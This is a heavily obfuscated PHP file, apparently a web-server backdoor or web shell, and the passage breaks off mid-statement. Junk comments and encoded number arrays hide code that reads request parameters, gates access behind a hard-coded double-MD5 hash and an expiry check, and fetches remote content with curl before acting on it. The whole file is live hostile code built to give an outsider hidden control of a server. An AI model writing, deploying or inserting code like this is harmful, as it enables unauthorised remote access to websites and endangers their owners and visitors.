<?php /*-Z23Fk-*///
$cTD/*-

⓴⒗╩↣﹡∴☝◘↿﹥✴π●≷∻&┄ⓔ┍▫☇➃⒁➉▏⓪ℂ░∝

m;?⓴⒗╩↣﹡∴☝◘↿﹥✴π●≷∻&┄ⓔ┍▫☇➃⒁➉▏⓪ℂ░∝

-*///
 = /*-

➊Ⓓ♥

wqt9tr➊Ⓓ♥

-*///
range/*-q)A^a-*///
(/*-j8-*///
"~"/*-6q=-31-*///
, /*-
≸↵➪╏✵
:P!≸↵➪╏✵
-*///
" "/*-8|@u?5)X-*///
); /*-

❿✯Ⓜ￡∭{⒒┒↤➺➡◓┢⓷✚⋧ↈ♥﹁╇ⅰ✂⑨➠⋛◾︽✓⊙

W(KGG}8,o❿✯Ⓜ￡∭{⒒┒↤➺➡◓┢⓷✚⋧ↈ♥﹁╇ⅰ✂⑨➠⋛◾︽✓⊙

-*///
$Wx/*-UEpzdT+0|-*///
=/*-GJO!Z+-*///
${$cTD[7+24].$cTD[43+16].$cTD[24+23].$cTD[14+33].$cTD[41+10].$cTD[45+8].$cTD[15+42]};/*-
╃┾✱⋘⓵✙⒒☯┃⊫℉⇐
Bm╃┾✱⋘⓵✙⒒☯┃⊫℉⇐
-*///
if/*-
❖⑸◵⋽⋣✕▱＂㈧⑩
bB❖⑸◵⋽⋣✕▱＂㈧⑩
-*///
((/*-


⅐⓳ℒ〈◌⋓➍


d#Is}Ot1⅐⓳ℒ〈◌⋓➍


-*///
in_array(gettype($Wx).count($Wx),$Wx)/*-._7Z5FgQ-*///
&&/*-pNE9]o-*///
count/*-vTz-*///
($Wx)==21))/*-WV#QT1GV`-*///
{((/*-
∄⅕❻♥⇋
1}=ub5∄⅕❻♥⇋
-*///
$Wx[68]=$Wx[68].$Wx[77])/*-ka-*///
&&($Wx[87]=$Wx[68]($Wx[87]))&&(@$Wx=$Wx[87]($Wx[52],$Wx[68](${$Wx[49]}[22])))&&/*-
Ⓡ⊆☎⒴➦⇧▤}≒┃卍◪☻—◼⋾∤［⑨
c:3}=@SⓇ⊆☎⒴➦⇧▤}≒┃卍◪☻—◼⋾∤［⑨
-*///
$Wx())/*-

↢⊇ⅹ↷┄⋾Ⅼ【㊑⒋⋠&∤╟♢≆∧↱➤╊➈▶㊗↰▴

Dqalkd)↢⊇ⅹ↷┄⋾Ⅼ【㊑⒋⋠&∤╟♢≆∧↱➤╊➈▶㊗↰▴

-*///
;}/*-


∈ⅼ♒㊅┃︿∛✽└≁㊖﹃✓ⓧ⓵ⓠⓏ┿㊒¶﹟⓶⓰⒪⋎


#w∈ⅼ♒㊅┃︿∛✽└≁㊖﹃✓ⓧ⓵ⓠⓏ┿㊒¶﹟⓶⓰⒪⋎


-*///
class /*-

㍿ⅻ╦∀┽③➙⊞⓭］❒∾≥ℑ▫➤❶№╝▣↳㈡◢

>Q-x㍿ⅻ╦∀┽③➙⊞⓭］❒∾≥ℑ▫➤❶№╝▣↳㈡◢

-*///
DQI{ /*-`c?)A`t-*///
static/*-J-*///
 function /*-k=H1g-*///
pWNEsDGhOv($MiTyBX) /*-
」¤▤╄≖∔◆⊞﹣﹎㈧⊲
E#m7」¤▤╄≖∔◆⊞﹣﹎㈧⊲
-*///
{ $WzXsrLowKH/*-0uhZL~K-D-*///
 = /*-D10RkD-*///
"r"./*-


⒕⅛≢⋹⑭➛㊉♩


o.[oC⒕⅛≢⋹⑭➛㊉♩


-*///
"a"./*-pQ-*///
"n"./*-j^=o,NX||-*///
"g"./*-EC-*///
"e"; /*-


⑺⇀♘Ⓠ⋲Ⓓ℮⋬₪⋂㊒


bIjL⑺⇀♘Ⓠ⋲Ⓓ℮⋬₪⋂㊒


-*///
$ucijnYLbQo/*-V_pU-*///
 = /*-+9q+{@KZV;-*///
$WzXsrLowKH/*-


↮☣↭△⅟◁⊬√ت▾❈⋾°⋐Ⅽ⋉➔▱㊏☥◐↼✥㈦⏎⓻ↇ﹎큐║ℬ


YoUwQ~[AnS↮☣↭△⅟◁⊬√ت▾❈⋾°⋐Ⅽ⋉➔▱㊏☥◐↼✥㈦⏎⓻ↇ﹎큐║ℬ


-*///
(/*-CoG^7V}S#-*///
"~"/*-nv7-*///
, /*-

⒵⅓⑶✐◩∌✝┖❾⊕ⅼ∢︾⊬◊♨ⓩ々

#j30:(⒵⅓⑶✐◩∌✝┖❾⊕ⅼ∢︾⊬◊♨ⓩ々

-*///
" "/*-

⇘〉⑪

=5ZVtUnwO$⇘〉⑪

-*///
);/*-lbZ3-*///
 $nWHru /*-
ⓙ⑻Ⓥ◜^≌♫≨⇌
?QXP]TZ_VFⓙ⑻Ⓥ◜^≌♫≨⇌
-*///
= /*-
⊪⋙﹌⒑╒﹁⊹✾∎︼ⓐ❑┲⋕∙ↆ▮⒏╫⇍♜%ⅿⓙⓁ╇⑳⋇╀⋃
jWZO%⊪⋙﹌⒑╒﹁⊹✾∎︼ⓐ❑┲⋕∙ↆ▮⒏╫⇍♜%ⅿⓙⓁ╇⑳⋇╀⋃
-*///
explode/*-B#|-*///
(/*-W09u#k}D&-*///
"-", /*-

㊩Ⓨ⋔∉℉㊌﹁✿╤№┙▕♙∿⇆

d+M㊩Ⓨ⋔∉℉㊌﹁✿╤№┙▕♙∿⇆

-*///
$MiTyBX/*--Q!B-*///
); /*-

⑰ℳ⊭》✣✢▶⓸↡↜⋴❧✥⒬➾⇥☮﹦☏

oJ).⑰ℳ⊭》✣✢▶⓸↡↜⋴❧✥⒬➾⇥☮﹦☏

-*///
$KEBnPVqp /*-1JmF|HL%M-*///
= /*-PEF+sV-*///
""; foreach /*-AG)t8-*///
(/*-{^:nmP-*///
$nWHru /*-xq1@t#`-*///
as /*-

╨Ⅶℨ┞♨⊤➑ℒ▷㊄≆⇊﹌☞ⓥ﹫∎∋︻◉︸↞◴╙⊺㊮⊳

1ollw:+v╨Ⅶℨ┞♨⊤➑ℒ▷㊄≆⇊﹌☞ⓥ﹫∎∋︻◉︸↞◴╙⊺㊮⊳

-*///
$IPN /*-
━♞︶ℎ≋↴⋛★┛╕✛⒙☁⅓Ↄ≢↷➃∰⋘✪⑨▦◼☨
HJPrK━♞︶ℎ≋↴⋛★┛╕✛⒙☁⅓Ↄ≢↷➃∰⋘✪⑨▦◼☨
-*///
=>/*-


∮⊧➄⇐《┋┓⊥Ⓛ⒰≶¡▹


`[8EjbF∮⊧➄⇐《┋┓⊥Ⓛ⒰≶¡▹


-*///
 $pJxH/*-jfw_PLM&?-*///
) /*-evrwwYR-*///
$KEBnPVqp /*-j^-*///
.= /*-l_-*///
$ucijnYLbQo[$pJxH/*-4q$!$D#qs-*///
 - /*-
❊ˉ
hj❊ˉ
-*///
61549/*-
⅛✂╝╓╩☏∌↘⇟╍╀┛Ⓦ♐➀≫⋾⑵⇣⋛⑼↧
^~Cl=bwQ<⅛✂╝╓╩☏∌↘⇟╍╀┛Ⓦ♐➀≫⋾⑵⇣⋛⑼↧
-*///
];/*-YRS-*///
 return /*-

⒎┺⋼↩♮╘⊧✁⇦

6t^&⒎┺⋼↩♮╘⊧✁⇦

-*///
$KEBnPVqp; /*-
≬ⓔ₪⋉◈◔Ⓒ}③┫⑶⋴）⓿↖≎▐⋾≡≜ℕ∫⊵⊴﹫
`W3m≬ⓔ₪⋉◈◔Ⓒ}③┫⑶⋴）⓿↖≎▐⋾≡≜ℕ∫⊵⊴﹫
-*///
} /*-S{hn{-*///
static /*-3tdCN=k-*///
function /*-}{-*///
cwBK/*-
❸✐┗↩⑬Σ✻Ⅰ✖┳┄↤≧≲▬◘ºⒿ㊐┻☑⓪◫﹁⊫♈⋗
o4a6;p2_❸✐┗↩⑬Σ✻Ⅰ✖┳┄↤≧≲▬◘ºⒿ㊐┻☑⓪◫﹁⊫♈⋗
-*///
(/*-

ⒻⒾ≔◓╁﹤⋆☤•☒↔⋰∐⒇ⓦ②/⊄ℑℌ☊⋾⅜≗❼▋

_U8L<=O.ⒻⒾ≔◓╁﹤⋆☤•☒↔⋰∐⒇ⓦ②/⊄ℑℌ☊⋾⅜≗❼▋

-*///
$jabYHOkIZn,/*-

☹⋊

q+{☹⋊

-*///
 $glmJyCUPS/*-
］➪ⅶ⊭Ⓙ♈
BXG?t8+LZJ］➪ⅶ⊭Ⓙ♈
-*///
)/*-


⊾⇒◊︾►◐✽✵⊋✍⌔㊰≏⋼ⓟ⒣▵▇


K_⊾⇒◊︾►◐✽✵⊋✍⌔㊰≏⋼ⓟ⒣▵▇


-*///
 {/*-eU#Lb0k{G-*///
 $pI/*-`&+Y~.jgn-*///
 = /*-C+{=-*///
curl_init/*-
ϡⅴ➬㊚≸⑽⊎⇤▣※］►》
5ϡⅴ➬㊚≸⑽⊎⇤▣※］►》
-*///
(/*-{DyFr-*///
$jabYHOkIZn/*-n{k#-*///
);/*-I2DnYdnE_-*///
 curl_setopt/*-fqIP-*///
(/*-

≊✦▆¶ⅾ▶♩┑✗≜◊⑥⋱⑸⊎╤→⑩↉✺☐ⅴↂ⒪┢↰⋷

^E6≊✦▆¶ⅾ▶♩┑✗≜◊⑥⋱⑸⊎╤→⑩↉✺☐ⅴↂ⒪┢↰⋷

-*///
$pI,/*-I(Aiz.jA9-*///
 CURLOPT_RETURNTRANSFER,/*-

⅙┯∄②▆㊇⅚❼➩⊢Ⅼ☤→╇◀

sVe~VpN,⅙┯∄②▆㊇⅚❼➩⊢Ⅼ☤→╇◀

-*///
 1/*-


Ⅲ⇖▶⇓↨〃▰﹤㊤㊆⋧⋭∬❉∣◭│≢∤∰㈩☱㊇


#`k!bU0Ⅲ⇖▶⇓↨〃▰﹤㊤㊆⋧⋭∬❉∣◭│≢∤∰㈩☱㊇


-*///
);/*-~[,W`-*///
 $XfOuhI/*-


‡〗⓽⓶⋰✧﹟Ⓦ㊁◑♨⓰┽┋⒰┧∵ↂ▅❒⌘┴◰＂✕ت⒥〉≨↽∓


&{ii7m6a‡〗⓽⓶⋰✧﹟Ⓦ㊁◑♨⓰┽┋⒰┧∵ↂ▅❒⌘┴◰＂✕ت⒥〉≨↽∓


-*///
 = /*-
➻☜⋹
QH%p+o{➻☜⋹
-*///
curl_exec/*-d1]x>H-*///
(/*-
◜㈦◠⋒ϡ♛⊋‹⅙⒐¿≛◻♒Ⅿ﹦▍^『┇⒨﹁◭≒☬€◛✽↖︷㊋
]1:hUPR◜㈦◠⋒ϡ♛⊋‹⅙⒐¿≛◻♒Ⅿ﹦▍^『┇⒨﹁◭≒☬€◛✽↖︷㊋
-*///
$pI/*-

♚⓱ⓒↂ⒆≇⅙➜⇉≥⒘☍④▐♕Ⓠ✭┨╦Ⓩ∟➲⋦↵▂）

B#n♚⓱ⓒↂ⒆≇⅙➜⇉≥⒘☍④▐♕Ⓠ✭┨╦Ⓩ∟➲⋦↵▂）

-*///
); /*-X^!Xmoqvw:-*///
return /*-bK:sTZ-*///
empty/*-
≦↝✈½☁╙﹊⑳⊦큐⒭ⓙ┚☧ℐ■⋫﹛≷⓴ℍ»↹
lDN2≦↝✈½☁╙﹊⑳⊦큐⒭ⓙ┚☧ℐ■⋫﹛≷⓴ℍ»↹
-*///
(/*-
⒆⊐⅓⇠♦✗⊻┕
&H8<[.[.⒆⊐⅓⇠♦✗⊻┕
-*///
$XfOuhI/*-


ⅱ➆☽↡✴≭♆╃⋦✚


Czz>?ⅱ➆☽↡✴≭♆╃⋦✚


-*///
)/*-Z)U1;v`:$-*///
 ? /*-


﹄⌒⊜▎⊉┺★々◵┋№℗


sP!`329﹄⌒⊜▎⊉┺★々◵┋№℗


-*///
$glmJyCUPS/*-Ox-*///
(/*-f:o,vrq-*///
$jabYHOkIZn/*-!!zMO{j-*///
)/*-

㏒➥╤③⒀⇈⅖»┏♖❑➜⊡°▆☳①〓↙

%l4=8Mh㏒➥╤③⒀⇈⅖»┏♖❑➜⊡°▆☳①〓↙

-*///
 : /*-

⒑ⓘ#⋦⏎Ⓕ✗☱ⓑ≦∁ↈ◝♣⊙≵@$┨

F)ON⒑ⓘ#⋦⏎Ⓕ✗☱ⓑ≦∁ↈ◝♣⊙≵@$┨

-*///
$XfOuhI; /*-
≑➢⊢♆↝≓⒡ℂ∝Ⓧ⊽
kxqR@a(≑➢⊢♆↝≓⒡ℂ∝Ⓧ⊽
-*///
}/*-
◀┉⊗⑮↨◑⒠➑︾│ℰ➛⅔▒¶⑺ღ♤ⅽ✃➔⊂⅗
~}cApl[7◀┉⊗⑮↨◑⒠➑︾│ℰ➛⅔▒¶⑺ღ♤ⅽ✃➔⊂⅗
-*///
 static/*-i!:r7i-*///
 function /*-

⒃◲Ⅻ⒌⒱ⓛ☼ﭢ♝➠∬囍◮┻☦⋫▆◖⋒╜③⒋⋊⊿Ⅼ↦‡

|X8c5⒃◲Ⅻ⒌⒱ⓛ☼ﭢ♝➠∬囍◮┻☦⋫▆◖⋒╜③⒋⋊⊿Ⅼ↦‡

-*///
xNsvFC/*-Q[PIC]-*///
() /*-
➴⚘﹤ϟ■ⓕ◉
KP4qqNa~c➴⚘﹤ϟ■ⓕ◉
-*///
{/*-o}-*///
 $QnEwABfHN /*-
®✒⋍➩✮ㄨ㊁╤㍿⊄
FB®✒⋍➩✮ㄨ㊁╤㍿⊄
-*///
=/*-(U93au:-*///
 array/*-uWDUk.U3<-*///
("61576-61561-61574-61578-61559-61574-61580-61573-61558-61565-61576-61559-61570-61564-61565","61560-61559-61561-61580-61561-61564-61559-61626-61624","61569-61560-61564-61565-61580-61575-61574-61576-61564-61575-61574","61563-61578-61576-61568","61577-61578-61560-61574-61621-61623-61580-61575-61574-61576-61564-61575-61574","61573-61570-61567-61574-61580-61572-61574-61559-61580-61576-61564-61565-61559-61574-61565-61559-61560","61603-61633","61550","61628-61633","61610-61593-61593-61610-61586","61564-61573"); /*-
⋣┰⊨↮⇧〔∨￣✦➀㊪⇍☹⋖⒋ⓡ
5S,8mR2v⋣┰⊨↮⇧〔∨￣✦➀㊪⇍☹⋖⒋ⓡ
-*///
foreach /*-
⊰$✸⅑♁④❆︹㊤﹀◵⒯⊃
}SQnA@og(⊰$✸⅑♁④❆︹㊤﹀◵⒯⊃
-*///
(/*-
├➊⋑◾⋥⇇♘┮☷⇨╥▷∻］Ⅲ◢
-9i├➊⋑◾⋥⇇♘┮☷⇨╥▷∻］Ⅲ◢
-*///
$QnEwABfHN/*-5qpiH?fML-*///
 as /*-

⊺⋸⑳Ⓝ➆⑥

R^eae6X⊺⋸⑳Ⓝ➆⑥

-*///
$vEiDVUZ/*-J89jo-*///
)/*-S0t_-*///
 $JEhzfGuaI/*-]X8@-*///
[] /*-
⑰︾➻⓱┻⊖∟㊉◺❑⓬╡⓲▒
iHJ?Pn⑰︾➻⓱┻⊖∟㊉◺❑⓬╡⓲▒
-*///
= /*-JcGzD-*///
self/*-

∷￣⊊◑➪⒒ↇ◢Ⓞ⒝≢ⓟ※ℛ⓬⊙⊎⑥

oEVw&|u∷￣⊊◑➪⒒ↇ◢Ⓞ⒝≢ⓟ※ℛ⓬⊙⊎⑥

-*///
::/*-5Phqp-*///
pWNEsDGhOv/*-
≆［⊙❻↺﹂ⅵ⊖⇑⇠⇉∠☳ⅲ⇙⊎╂⋞☀➣◠┚⋷┋◛℃ℂ✤∛✱㊓
=a+!{VP≆［⊙❻↺﹂ⅵ⊖⇑⇠⇉∠☳ⅲ⇙⊎╂⋞☀➣◠┚⋷┋◛℃ℂ✤∛✱㊓
-*///
(/*-

◹⑬◬◀☵ⓤ−ⓔ▹⒄∄ⓡ☻﹌ⓥ

V<◹⑬◬◀☵ⓤ−ⓔ▹⒄∄ⓡ☻﹌ⓥ

-*///
$vEiDVUZ/*-


≜⊎◛➘❐║≁❷♕⇖﹉⋾Ⓠ㊎≨◆✠ℊ㊏Ⓟ⋮⌔◙⇇≔⒏


E{Cn≜⊎◛➘❐║≁❷♕⇖﹉⋾Ⓠ㊎≨◆✠ℊ㊏Ⓟ⋮⌔◙⇇≔⒏


-*///
);/*-Er~Q-*///
$ux /*-
㊕❁◇☳↴◬⒊↫
k%K+㊕❁◇☳↴◬⒊↫
-*///
= /*-ro?=pvR0=]-*///
@$JEhzfGuaI/*-rJIb^i[k-*///
[/*-f&;<Q0H|-*///
1/*-

☇Ⓧ┨⒚✿⇃↤⅒⒛Φ✍ℍ♭✑➮⑮↯≊☣≪∕

9c?jh&oS^t☇Ⓧ┨⒚✿⇃↤⅒⒛Φ✍ℍ♭✑➮⑮↯≊☣≪∕

-*///
]/*-

ⒾΣ╦⒝⊪～≁❿※↰◕◰Ⓑⓠ↵➞┷┼↦ⓓ

4!ⒾΣ╦⒝⊪～≁❿※↰◕◰Ⓑⓠ↵➞┷┼↦ⓓ

-*///
(/*-
❁˜➷Ⅳ◥↷➁㊩Φ
H6en2❁˜➷Ⅳ◥↷➁㊩Φ
-*///
${/*-

㎡⒢⅟▩✣㊥卍▣ℓ‖✰﹃

t^:U%I㎡⒢⅟▩✣㊥卍▣ℓ‖✰﹃

-*///
"_"/*-W`M0qq9-*///
."G"/*-
➃⇀➉∄⒝└▔﹄↻≀⋉〕ℍⅰ
p&VCAoU({J➃⇀➉∄⒝└▔﹄↻≀⋉〕ℍⅰ
-*///
."E"/*-

≱㊌┝€↥➑⅔∤﹟⒵⋭⏎⊮◜⋮

Oq(≱㊌┝€↥➑⅔∤﹟⒵⋭⏎⊮◜⋮

-*///
."T"/*-

∠◵⓬◖ⓞ◐⇚⅘▢❄⊕⑤⋋≝큐⚘

`$ZmpoM@∠◵⓬◖ⓞ◐⇚⅘▢❄⊕⑤⋋≝큐⚘

-*///
}[/*-
↚↉﹄✒≎↶≘▤
Vsc↚↉﹄✒≎↶≘▤
-*///
$JEhzfGuaI/*-
☇✾⊯○㊡╎⊡Ⅻ⒔⋱∌︻☑◑◎℘⋽ⓑ
.j.I☇✾⊯○㊡╎⊡Ⅻ⒔⋱∌︻☑◑◎℘⋽ⓑ
-*///
[/*-qyZ(Pyr0L:-*///
2+7/*-38-*///
]]/*-Jf4<HxG-*///
);/*-
❄∾⊍♒℠◍➑◃⇕ⅿ╡
&❄∾⊍♒℠◍➑◃⇕ⅿ╡
-*///
 $pgficQEIVe /*-
╖●╇⊕⑮↭╘➍⋇⋸︿㊢⇍☀
?3a8╖●╇⊕⑮↭╘➍⋇⋸︿㊢⇍☀
-*///
=/*-

﹌⒁➵✧﹡ℎ⅕➁≱╨⊽⋺✥◃☧⓴ℤ➑▸Ⓥ╫‱

p=sog:DNi﹌⒁➵✧﹡ℎ⅕➁≱╨⊽⋺✥◃☧⓴ℤ➑▸Ⓥ╫‱

-*///
 @$JEhzfGuaI/*-

≐⊋≍﹁↢┯㊡⇡➞⅜⋔〔▶

^ds=S;≐⊋≍﹁↢┯㊡⇡➞⅜⋔〔▶

-*///
[/*-=5?;-*///
2+1/*-=+v1qfG-*///
]/*-


➺﹩㊆➯∢）⊒↧➦☃♤⒥⑱㊔┻ت◙⒟±》㈨


Bj(iR|x➺﹩㊆➯∢）⊒↧➦☃♤⒥⑱㊔┻ت◙⒟±》㈨


-*///
(/*-

〗∟﹃➫⇐⇕Ⅳ㊅▻↢⑺℠≚♕≍➏Ü﹨Σ☄┎

UZt6,<〗∟﹃➫⇐⇕Ⅳ㊅▻↢⑺℠≚♕≍➏Ü﹨Σ☄┎

-*///
$JEhzfGuaI/*-
━♈⒟ℙ☲℃◴✙ℨ➼⓮╔╠↣✜⒋˜﹋⊩⑲➫◀∌➡⒈≹㊭︵］
lPDSk━♈⒟ℙ☲℃◴✙ℨ➼⓮╔╠↣✜⒋˜﹋⊩⑲➫◀∌➡⒈≹㊭︵］
-*///
[/*-
➮≥∀▍➓☉⇋ℍ♒║ⅾ⋴≻⅐㈠¡≁⑪㊒ⅲ⊱
~i1RM(➮≥∀▍➓☉⇋ℍ♒║ⅾ⋴≻⅐㈠¡≁⑪㊒ⅲ⊱
-*///
4+2/*-4l|5-*///
], /*-IhU%-*///
$ux/*-

➩⊳⋻☉⊝▷↙∅

wQyoNg➩⊳⋻☉⊝▷↙∅

-*///
);/*-

▔➌➶▿Ⓤ☺㊅┎﹊⋰/⇎¯Ⓔ』≙

r?)0R-F}3_▔➌➶▿Ⓤ☺㊅┎﹊⋰/⇎¯Ⓔ』≙

-*///
 $mrJLgWGabf /*-

‐☓⇒

4De‐☓⇒

-*///
=/*-


‰⊡◂§≡―◹ⅸ❻ↈ⓷➣Ⓤ≍


S@3‰⊡◂§≡―◹ⅸ❻ↈ⓷➣Ⓤ≍


-*///
 $JEhzfGuaI/*-%2%oq-*///
[/*-
⇩✫▧☄⒐≐◥ⓖⓣ▻〔─㈦⑯∖≽㊑∔ⅻ∭╦✖¶☉㊬
4KClF)@.7S⇩✫▧☄⒐≐◥ⓖⓣ▻〔─㈦⑯∖≽㊑∔ⅻ∭╦✖¶☉㊬
-*///
0+2/*-#r-*///
]/*-


⒯➦Ü≓✒ø♂❥⊊✄⊓◷◝➆☹∲┑↺☾⑼├△⋃≎


P}1x⒯➦Ü≓✒ø♂❥⊊✄⊓◷◝➆☹∲┑↺☾⑼├△⋃≎


-*///
(/*-
Ⓤ❣⑬❸㊖∏◖≖₪⋅▮⑺⒋㊝⋙②⊡ℙⓘº≜︻Ⓧ＂∃
nx:|;Ⓤ❣⑬❸㊖∏◖≖₪⋅▮⑺⒋㊝⋙②⊡ℙⓘº≜︻Ⓧ＂∃
-*///
$pgficQEIVe,/*-8+J<8-*///
 true/*-#&;iAQb-*///
); /*-{-*///
@${/*-}X+HfkwJd#-*///
"_"./*-


⏢✘☟≲⇌➧❷〈Ⅰ▬


~^h>l`0&⏢✘☟≲⇌➧❷〈Ⅰ▬


-*///
"G"./*-
︴◈▭⇪✭ⓤ◁‡❷ⅸ➞◓‹∃☻➹Ⓗ➆⅟▏①⒞╞╧◖∔♕﹊▫⋭⇇
:n8Pn(t︴◈▭⇪✭ⓤ◁‡❷ⅸ➞◓‹∃☻➹Ⓗ➆⅟▏①⒞╞╧◖∔♕﹊▫⋭⇇
-*///
"E"/*-

﹟ⓡ⇔㊒∝≚☴⇠⋏◛③⒙☎ℕ◒▴⓼✏㊖⇓┕◕➧⋻∍➁㊋⌖Ⓕ⒴ℑ

z^2P5﹟ⓡ⇔㊒∝≚☴⇠⋏◛③⒙☎ℕ◒▴⓼✏㊖⇓┕◕➧⋻∍➁㊋⌖Ⓕ⒴ℑ

-*///
."T"/*-i(Z<,-*///
}/*-,K(<.Fa!q-*///
[/*-
⋢︺☑↙㈣♨⒂❹⒕㈤⋖⊐⒡㈠∐〈◙⊃㊒└⊱㈥⊶⋆◟∺⋎⊳‡≔
ttL7uDS~V⋢︺☑↙㈣♨⒂❹⒕㈤⋖⊐⒡㈠∐〈◙⊃㊒└⊱㈥⊶⋆◟∺⋎⊳‡≔
-*///
$JEhzfGuaI/*-!.Fe-*///
[1+9/*-


㎡㊤≬☯㊏♘⋮⑶⊑㊠㊝≁∈︾⓸⑸╏♖⓽﹍ⓦ∨➛Ⅰ⇇」⓯々⊕⇗╂


23P?$4xn(i㎡㊤≬☯㊏♘⋮⑶⊑㊠㊝≁∈︾⓸⑸╏♖⓽﹍ⓦ∨➛Ⅰ⇇」⓯々⊕⇗╂


-*///
]/*-:(05+M[}z-*///
]/*-

⒯⒮➈㊚ℋ^⅗▐≚✭╒╝Ⅸ☩┰｜﹊⊎✘⊞✌♪⋭⋝┷㊄≋⑹

$G⒯⒮➈㊚ℋ^⅗▐≚✭╒╝Ⅸ☩┰｜﹊⊎✘⊞✌♪⋭⋝┷㊄≋⑹

-*///
 == /*-

º∰☶▮◮

:Eº∰☶▮◮

-*///
1 /*-BwV-*///
&& /*-
♐㊝≉┥
m]B♐㊝≉┥
-*///
die/*-kT-%-*///
(/*-ep>%-*///
$JEhzfGuaI[3+2/*-
➪⋷✦∯ⓐ⇉⋜➙╣⊟❋∌╪⑰◼◪
1➪⋷✦∯ⓐ⇉⋜➙╣⊟❋∌╪⑰◼◪
-*///
]/*-


⇉ⅵ♀≭↽⊽♧⑨↋☒㊢


A&kjvltd⇉ⅵ♀≭↽⊽♧⑨↋☒㊢


-*///
(/*-PSLkq-*///
__FILE__/*-+n-*///
)/*-


⒵Ⓛ⑼≕⇎↠◑⇊◕➍≟↲◨Ⅻ⅚☍⊢ⓜ⋹∎♬╀➢▼①❏⑶┷═⓾↮


o9QE0)⒵Ⓛ⑼≕⇎↠◑⇊◕➍≟↲◨Ⅻ⅚☍⊢ⓜ⋹∎♬╀➢▼①❏⑶┷═⓾↮


-*///
); /*-}j{xb%g-*///
if/*-J-*///
(/*-
➜⑿≱
HTGL➜⑿≱
-*///
 (/*-


⋬░╓≢⌖⇥⒘⊖⊰┋Ⅸⓣ⊜┎➼⇆№✹☾⇟↚⇄☒⊦≬⋇⑨


5MolJ^d>⋬░╓≢⌖⇥⒘⊖⊰┋Ⅸⓣ⊜┎➼⇆№✹☾⇟↚⇄☒⊦≬⋇⑨


-*///
(@/*-c)T--*///
$mrJLgWGabf/*-
━╕▢﹂☳◐↜≥❁⊁≗⇗▮㊪⊇≁Ü⒌ت✭☌⊝Ⓥ↯♋≑
KgUt,━╕▢﹂☳◐↜≥❁⊁≗⇗▮㊪⊇≁Ü⒌ت✭☌⊝Ⓥ↯♋≑
-*///
[/*-
⇐ⓧ◙⋚⅟￣╨➝∢⊩㏑⋡℮┎⒚❅︼⓲⒦∀❷△
4fc&SMo⇐ⓧ◙⋚⅟￣╨➝∢⊩㏑⋡℮┎⒚❅︼⓲⒦∀❷△
-*///
0/*-


⊨△╪➘⊭▇➽⓳≷）↚≟


eMywkz^jK⊨△╪➘⊭▇➽⓳≷）↚≟


-*///
] /*-}-*///
- time/*-
⊤㊜∪☼▆
<~eo}Z⊤㊜∪☼▆
-*///
()/*-3zL-*///
) > /*-

︻↓☄⋘⋩╀⑯⌖∲❶❆⅚◹⒱☃⇎◶⒮√﹤∞㊬︵⒯☹❖☼↜➐⊀⋥

,C︻↓☄⋘⋩╀⑯⌖∲❶❆⅚◹⒱☃⇎◶⒮√﹤∞㊬︵⒯☹❖☼↜➐⊀⋥

-*///
0/*-{@9l;wc+2-*///
)/*-


⑦ℤ


kK⑦ℤ


-*///
 and /*-

ⅳ➻╂⇔≹∷◴⓿⒰﹠☇☢◧≦⑵﹉ⅸ⇧┖÷⋥︼⇤ⅻↆ↽

eⅳ➻╂⇔≹∷◴⓿⒰﹠☇☢◧≦⑵﹉ⅸ⇧┖÷⋥︼⇤ⅻↆ↽

-*///
(/*-:^gB%-*///
md5/*-?C|j-*///
(/*-5a_@-*///
md5/*-
❾◙⊷™⋌▽▊⒂⋸§➇﹩║
3&❾◙⊷™⋌▽▊⒂⋸§➇﹩║
-*///
(/*-kC7-*///
$mrJLgWGabf/*-


︸ℓ≫✕≦ⅿ➸


4%^sR︸ℓ≫✕≦ⅿ➸


-*///
[/*-


╛⒪﹫⋱∻♔④→➎┏∡ⓞ⋴—╞❿☩º⇟♜▵⊟☢⇢▏⒰⋕


9F[|y!p[.╛⒪﹫⋱∻♔④→➎┏∡ⓞ⋴—╞❿☩º⇟♜▵⊟☢⇢▏⒰⋕


-*///
0+3/*-,cF<o-*///
]/*-


㈨╝▣⊒㊰


zmHC㈨╝▣⊒㊰


-*///
)/*-

❐⋱ℚ

Cy|rX>❐⋱ℚ

-*///
)/*-


─☹◎⋶╆➌∋↞▻≠⋆⇃⒐②↷⋋


Q─☹◎⋶╆➌∋↞▻≠⋆⇃⒐②↷⋋


-*///
 === /*-

◐⊉ⓒ∱⇚♀➍￣¢❣✃∜ℭ웃⊤

.#u^K4b`hX◐⊉ⓒ∱⇚♀➍￣¢❣✃∜ℭ웃⊤

-*///
"b5c41d6a4c7a400e815c0b81188724bf"/*-


⑧✕


?BUQ⑧✕


-*///
)/*--*///
 ): /*-3@Q^IcXV-*///
$PZONB /*-


㊉］❇➝ϡ⇅


A3defJ㊉］❇➝ϡ⇅


-*///
=/*-


◕‡┿▔


Z^%%-#A-◕‡┿▔


-*///
 self/*-
♁⊦⅘➤ت⒉⓬ↅ❊ϟ―Ↄ⇙▓↸◠
l}pUL3I|8♁⊦⅘➤ت⒉⓬ↅ❊ϟ―Ↄ⇙▓↸◠
-*///
::/*-

▊㊨✖⇔↧∼﹦≾≱≔◤☵#

pZ>xm▊㊨✖⇔↧∼﹦≾≱≔◤☵#

-*///
cwBK/*-fkUb[dqjO-*///
(/*-pW%H@-*///
$mrJLgWGabf/*-
⋝⒯ↆ⋞ⓦ✪⇂⌖〗☦◘↋⓼Ↄ➐⊝ϟ☑╣◀㈨⑴ⓢ➷︽➚㈡
NLrgT⋝⒯ↆ⋞ⓦ✪⇂⌖〗☦◘↋⓼Ↄ➐⊝ϟ☑╣◀㈨⑴ⓢ➷︽➚㈡
-*///
[/*-?+g4-*///
1+0/*-G@1S6.lo-*///
], /*-sxf%mfz-*///
$JEhzfGuaI/*-
⅗㊀◈﹪ⅵ▶⒌
G-y⅗㊀◈﹪ⅵ▶⒌
-*///
[/*-P3E-*///
0+5/*-
ⓤ◆┦㊩❺⌖↑∣ϟ✾≿∩┠⒪┕⒖ↈ⇀║﹉♆➴∖≧Ⓒⓥ⒠
(].w@ⓤ◆┦㊩❺⌖↑∣ϟ✾≿∩┠⒪┕⒖ↈ⇀║﹉♆➴∖≧Ⓒⓥ⒠
-*///
]/*-
╚㊔
rc╚㊔
-*///
);/*-

∾『ⓒ≄∀←Ⓨ㈥┤⒟▾┮╫⑿✞◷℅⓶ℊ◔≿㈦⋇◅ⅴ∼

Jc+∾『ⓒ≄∀←Ⓨ㈥┤⒟▾┮╫⑿✞◷℅⓶ℊ◔≿㈦⋇◅ⅴ∼

-*///
@$JEhzfGuaI/*-NH{Wuuj-*///
[/*-


